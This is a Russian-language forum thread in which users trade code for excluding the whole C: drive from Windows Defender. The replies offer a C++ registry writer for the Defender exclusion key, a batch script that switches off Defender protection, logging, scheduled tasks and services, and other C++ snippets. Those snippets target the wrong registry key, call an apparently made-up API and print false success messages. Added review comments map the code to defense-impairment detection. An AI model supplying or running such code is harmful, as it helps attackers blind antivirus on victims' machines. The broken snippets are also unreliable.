
Помогите с добавлением в исключение виндовс дефендора [C++]

Russian_Coder

Пожалуйста, обратите внимание, что пользователь заблокирован
Есть у кого-нибудь кусок кода на C++ для добавления диска C в исключения Windows Defender?
 
Есть у кого нибудь кусок кода с добавление в исключением вин дефа диска С
на с++
C++:
#include <Windows.h>
#include <iostream>
#include <ShObjIdl.h>

int main() {
    // Open HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
    // with KEY_SET_VALUE access; on failure an error is printed and the program exits with 1.
    // NOTE(review): this path is the Windows Firewall rule store, not a Windows Defender
    // Antivirus location, so the value written below is not an antivirus exclusion.
    HKEY hKey;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules", 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
        std::cerr << "Failed to open registry key." << std::endl;
        return 1;
    }

    // Write a REG_DWORD value named "C:\" with data 1 under the opened key.
    // NOTE(review): firewall rules are normally stored here as string values, so this DWORD
    // is presumably not a valid rule either — confirm before assuming it has any effect.
    DWORD value = 1;
    if (RegSetValueEx(hKey, L"C:\\", 0, REG_DWORD, (BYTE*)&value, sizeof(value)) != ERROR_SUCCESS) {
        std::cerr << "Failed to set registry value." << std::endl;
        RegCloseKey(hKey);
        return 1;
    }

    // NOTE(review): this message is inaccurate — the code above only wrote a value under
    // FirewallRules and never touched Defender configuration. For monitoring purposes an
    // unexpected write to this key is still worth reviewing.
    std::cout << "Successfully added C: to Windows Defender exclusion list." << std::endl;

    // Close the registry key handle.
    RegCloseKey(hKey);

    return 0;
}



C++:
#include <Windows.h>
#include <iostream>
#include <ShObjIdl.h>

int main() {
    // Path of the folder to be added to the Windows Defender exclusions (here the whole C: volume).
    LPCWSTR folderPath = L"C:\\";

    // Open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    // with KEY_SET_VALUE access; on failure an error is printed and the program exits with 1.
    // NOTE(review): modifying antivirus exclusions from an arbitrary program is the behaviour
    // catalogued as MITRE ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools).
    // Defenders should audit this key and alert on non-administrative-tooling writers.
    HKEY hKey;
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths", 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
        std::cerr << "Failed to open registry key." << std::endl;
        return 1;
    }

    // Write a REG_DWORD value named after folderPath with data 1 under the opened key.
    DWORD value = 1;
    if (RegSetValueEx(hKey, folderPath, 0, REG_DWORD, (BYTE*)&value, sizeof(value)) != ERROR_SUCCESS) {
        std::cerr << "Failed to set registry value." << std::endl;
        RegCloseKey(hKey);
        return 1;
    }

    // NOTE(review): the message reflects only the return code of RegSetValueEx; nothing here
    // checks that Defender honours the entry. An exclusion covering a volume root is a strong
    // compromise indicator — Defender configuration changes are logged as event 5007 in the
    // Microsoft-Windows-Windows Defender/Operational log, which is where to look for it.
    std::wcout << L"Successfully added " << folderPath << L" to Windows Defender exclusion list." << std::endl;

    // Close the registry key handle.
    RegCloseKey(hKey);

    return 0;
}
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Bash:
rem NOTE review: despite the "Bash" label this is a Windows batch file made of rem, reg and schtasks lines.
rem It sets policy registry values that switch Microsoft Defender Antivirus features off, stops the
rem Defender autologgers, disables its scheduled tasks, removes its tray and context-menu entries and
rem sets the Defender-related services to Start=4, i.e. disabled.
rem Defensive reading: this is MITRE technique T1562.001, Impair Defenses. Alert on reg.exe or
rem schtasks.exe touching the keys and task names listed below, keep Tamper Protection enabled, and
rem review Defender operational log events 5001 and 5007, which record protection being turned off
rem and configuration changes.
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
rem NOTE review: the first line deletes the whole Defender policy key, so any protective policy set there is lost too.
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
rem NOTE review: turning these autologgers off removes Defender trace data that responders would otherwise have.
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
rem NOTE review: a Start value of 4 on any of these service keys is a high-fidelity detection signal on a managed host.
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

на плюсы уже сам переводи :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Requires elevated privileges, so you may need to run the application as an administrator.

C++:
#include <windows.h>
#include <iostream>
#include <sddl.h>

#pragma comment(lib, "Advapi32.lib")

int main() {
    // Build a security descriptor from an SDDL string. The DACL it describes holds one
    // allow ACE (A) granting file-all-access (FA) to Everyone (WD).
    // The descriptor is allocated by the API and released with LocalFree below.
    PSECURITY_DESCRIPTOR pSD = nullptr;
    if (!ConvertStringSecurityDescriptorToSecurityDescriptor(
        L"D: (A;;FA;;;WD)", SDDL_REVISION_1, &pSD, nullptr)) {
        std::cerr << "Failed to convert security descriptor: " << GetLastError() << std::endl;
        return 1;
    }

    // NOTE(review): SetSystemFileProtection is not declared by any header included in this
    // listing and I cannot match it to a documented Win32 API — this call presumably does
    // not compile; confirm against the SDK.
    // NOTE(review): a security descriptor is an access-control object and has no relation to
    // antivirus exclusions. If a descriptor like this were applied to C:\ it would give every
    // account full access to the volume root, which weakens the host rather than excluding
    // anything from scanning.
    if (!SetSystemFileProtection(NULL, L"C:\\", SE_FILE_OBJECT, pSD)) {
        std::cerr << "Failed to set exclusion: " << GetLastError() << std::endl;
        LocalFree(pSD);
        return 1;
    }

    // Release the descriptor; the message below is printed whenever the call above returned non-zero.
    LocalFree(pSD);
    std::cout << "Exclusion added successfully!" << std::endl;

    return 0;
}
 

